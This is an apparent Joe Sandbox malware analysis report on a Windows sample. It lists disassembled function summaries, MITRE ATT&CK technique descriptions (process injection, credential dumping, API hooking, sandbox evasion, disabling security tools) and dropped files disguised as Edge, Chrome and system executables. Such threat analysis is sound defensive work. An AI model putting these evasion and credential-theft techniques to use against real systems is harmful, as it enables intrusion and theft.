Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8]H
API String ID: 3761405300-2720761729
Opcode ID: 98d545bfa34a8f0dbfe73aa2a8bfe731fda3e0a85a917eebca284be0986c0cd2
Instruction ID: 87e3b7c63778f541b8d1bcffdc6bb1941c1fec9bfde5ffb8ebdf309452107280
Opcode Fuzzy Hash: 98d545bfa34a8f0dbfe73aa2a8bfe731fda3e0a85a917eebca284be0986c0cd2
Instruction Fuzzy Hash: FF21B0B9510A00DBE710DF19FD85A693BE4BB48315F50883EE908CB7B1E3F55A818B4D

Function 0043D392 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,?), ref: 0043D3A1
GetLastError.KERNEL32 ref: 0043D3CC

Strings

@D, xrefs: 0043D3A8

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CurrentErrorLastProcess
String ID: @D
API String ID: 335030130-799566354
Opcode ID: 28efe7cf7847f175a23494e46bbfc88b1f9b9efef7723c763f8d675df4495f39
Instruction ID: 529c5d81d399bfddceed6e815400dbaa73697d1dd27971afb8aba556c63971fd
Opcode Fuzzy Hash: 28efe7cf7847f175a23494e46bbfc88b1f9b9efef7723c763f8d675df4495f39
Instruction Fuzzy Hash: 16016D71900218FFEB115FA0AC89EEF7BBDEB19354F20042AF601A1191E675DE40AB29

Function 0044E19E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044B9A5: GetLastError.KERNEL32(?,004650C4,00446E12,004650C4,?,?,0044688D,?,?,004650C4), ref: 0044B9A9
Part of subcall function 0044B9A5: _free.LIBCMT ref: 0044B9DC
Part of subcall function 0044B9A5: SetLastError.KERNEL32(00000000,?,004650C4), ref: 0044BA1D
Part of subcall function 0044B9A5: _abort.LIBCMT ref: 0044BA23

_abort.LIBCMT ref: 0044E1D0
_free.LIBCMT ref: 0044E204

Strings

p,F, xrefs: 0044E1FB

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p,F
API String ID: 289325740-222182985
Opcode ID: 17c4b275ed6aa0d9b908510107d41b1d3e9a12f3fcd6277cf500b9f658e931a8
Instruction ID: 822dffe74761da07c83d69248cae026c0cb0ba298cf6170acf6c985b30125199
Opcode Fuzzy Hash: 17c4b275ed6aa0d9b908510107d41b1d3e9a12f3fcd6277cf500b9f658e931a8
Instruction Fuzzy Hash: E401C8B1D00A21EBE7219F5BC40165EB364BF04724714026BE96463381CBF96D418FCE

Function 00441405 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00441410
___raise_securityfailure.LIBCMT ref: 004414CD

Strings

8]H, xrefs: 004414C8

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8]H
API String ID: 3761405300-2720761729
Opcode ID: 44bccc1fdb887dd756a11233fe5b9ae741e0e69b8744811da181beddb1e7b169
Instruction ID: 0a083af4bb6c0f1c1f67da79245b9fb15a72ab7ecb106317a4bf7343ebee1ba8
Opcode Fuzzy Hash: 44bccc1fdb887dd756a11233fe5b9ae741e0e69b8744811da181beddb1e7b169
Instruction Fuzzy Hash: 6D119DB9511A04DBD710EF19FC856AD3BF5BB08311B50983EE9088B7B1E7B49A818F4D

Function 0044AABA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0044E580: GetEnvironmentStringsW.KERNEL32 ref: 0044E589
Part of subcall function 0044E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E5AC
Part of subcall function 0044E580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E5D2
Part of subcall function 0044E580: _free.LIBCMT ref: 0044E5E5
Part of subcall function 0044E580: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E5F4

_free.LIBCMT ref: 0044AB00
_free.LIBCMT ref: 0044AB07

Strings

pbH, xrefs: 0044AAED

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: pbH
API String ID: 400815659-2222748101
Opcode ID: 225fcb13f2a2543466b72ed8f576f84505bc20bfdf5967c70192a5d276c8695d
Instruction ID: 80d6dff58ba7dbd3f0a5be0dcad1223779c683b87c50d3e3c099b7456ec6b8fb
Opcode Fuzzy Hash: 225fcb13f2a2543466b72ed8f576f84505bc20bfdf5967c70192a5d276c8695d
Instruction Fuzzy Hash: 3DE0E522A8580055FBA1767F6D02A9F01159B81379B1206AFF920A71C2DFAC881341EF

Function 004330CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,004331E7,?,?,0043325F,?,?,?,?,?,00433249), ref: 004330D0
GetLastError.KERNEL32(?,?,0043325F,?,?,?,?,?,00433249), ref: 004330DC

Part of subcall function 00427BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00427BD5

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004330E5

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 09a09679fc3976995036cfb7f14944517b23aa59658dd7a71a199e80bffbe3f8
Instruction ID: 8e7e978445d048f4a240bfdc61239b28eba39b6c2bc9cf15e2262d41a04b5b48
Opcode Fuzzy Hash: 09a09679fc3976995036cfb7f14944517b23aa59658dd7a71a199e80bffbe3f8
Instruction Fuzzy Hash: 5ED02E3160C23032CA0033246C0AD6F3C089B2273BFE0832AF139662E2EF288D4142DE

Function 004301FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0042F951,?), ref: 004301FF
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0042F951,?), ref: 0043020D

Strings

RTL, xrefs: 00430207

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 58f9cf436a00eadc5d458bebbcdb2b8a782ece61764048b9c6685898525b6752
Instruction ID: 380f816d05e4f740f71294a90c0373b8d0617fbd1cd86131bf0f1adf1af62887
Opcode Fuzzy Hash: 58f9cf436a00eadc5d458bebbcdb2b8a782ece61764048b9c6685898525b6752
Instruction Fuzzy Hash: 5FC0803124075057D73197717C0DB832E586B00F13F470559F545DB1D2D7EACC458764

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iqA8j9yGcd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft\Edge\Application\CSCD2DF9DC1BB554A3A91A2FCAEEB39352E.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files (x86)\Windows Photo Viewer\en-GB\8239df6b3c91e5

C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\42af1c969fbb7b

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe

Windows Analysis Report
iqA8j9yGcd.exe

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre